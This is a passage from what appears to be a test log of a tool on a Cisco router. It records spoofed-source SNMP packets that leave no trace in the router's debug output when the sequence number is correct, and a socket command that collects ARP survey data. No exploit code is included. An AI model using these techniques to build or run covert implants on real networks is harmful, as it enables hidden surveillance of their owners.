        1. Set to 18 and impersonated XXX.XXX.X.XX (TOPWAY-NET[CN]) while running wireshark on impersonated host
        2. Impersonated host saw no traffic, no logs, traps were sent by DUT. As expected, encoding errors incremented on output of show snmp.
        3. Enabled snmp packet debugging and tested with wrong seq number again - router reports:
          Jan 29 02:18:55.885 C6506: SNMP: Packet received via UDPUser Datagram Protocol from XXX.XXX.X.XX (TOPWAY-NET[CN]) on Vlan1

        4. Router does not see the snmp packet in debug output if sequence number is correct.
  8. Testing socket get arp survey
    1. Ran command to view arp survey data

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]> socket get_arp_survey_data
      [Success]
      Vlan: 0
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      10.11.0.10 00:50:56:88:5e:52 10.11.0.1 2016-01-28T22:23:29Z
      XXX.XXX.X.XX (TOPWAY-NET[CN]) 00:50:56:88:3c:e4 XXX.XXX.X.XX (TOPWAY-NET[CN]) 2016-01-28T22:11:58Z
      XXX.XXX.XX.XXX (TOPWAY-NET[CN]) 00:50:56:88:b0:96 XXX.XXX.XX.XXX (TOPWAY-NET[CN]) 2016-01-28T22:02:57Z

      ************ Success ************
      [socket get_arp_survey_data]

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]>

    2. Cleared arp survey data and then checked again

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]> socket get_arp_survey_data
      [Success]
      Vlan: 0
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      10.11.0.10 00:50:56:88:5e:52 10.11.0.1 2016-01-28T22:24:09Z

      ************ Success ************
      [socket get_arp_survey_data]

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]>

    3. Ran IXIA traffic and checked again

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]> socket get_arp_survey_data
      [Success]
      Vlan: 0
      Sender Protocol Address Sender Hardware Address Target Protocol Address Time Last Updated
      10.11.0.10 00:50:56:88:5e:52 10.11.0.1 2016-01-28T22:43:43Z
      10.11.0.59 02:1a:c5:05:00:1b 10.11.0.1 2016-01-28T22:36:58Z
      XXX.XXX.X.XX (TOPWAY-NET[CN]) 00:50:56:88:e1:dd XXX.XXX.X.XX (TOPWAY-NET[CN]) 2016-01-28T22:36:58Z
      XXX.XXX.X.XX (TOPWAY-NET[CN]) 02:1a:c5:04:00:16 XXX.XXX.X.XX (TOPWAY-NET[CN]) 2016-01-28T22:36:58Z
      10.11.0.51 02:1a:c5:05:00:13 10.11.0.1 2016-01-28T22:32:00Z
      XXX.XXX.X.XX (TOPWAY-NET[CN]) 02:1a:c5:04:00:18 XXX.XXX.X.XX (TOPWAY-NET[CN]) 2016-01-28T22:32:00Z
      XXX.XXX.XX.XXX (TOPWAY-NET[CN]) 00:50:56:88:b0:96 XXX.XXX.XX.XXX (TOPWAY-NET[CN]) 2016-01-28T22:24:44Z

      ************ Success ************
      [socket get_arp_survey_data]

      [XXX.XXX.X.XX (TOPWAY-NET[CN])]>

    4. Not as many as I'd thought, however this delivery doesn't snoop.  Cleared and then viewed data while IXIA was running three times.

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh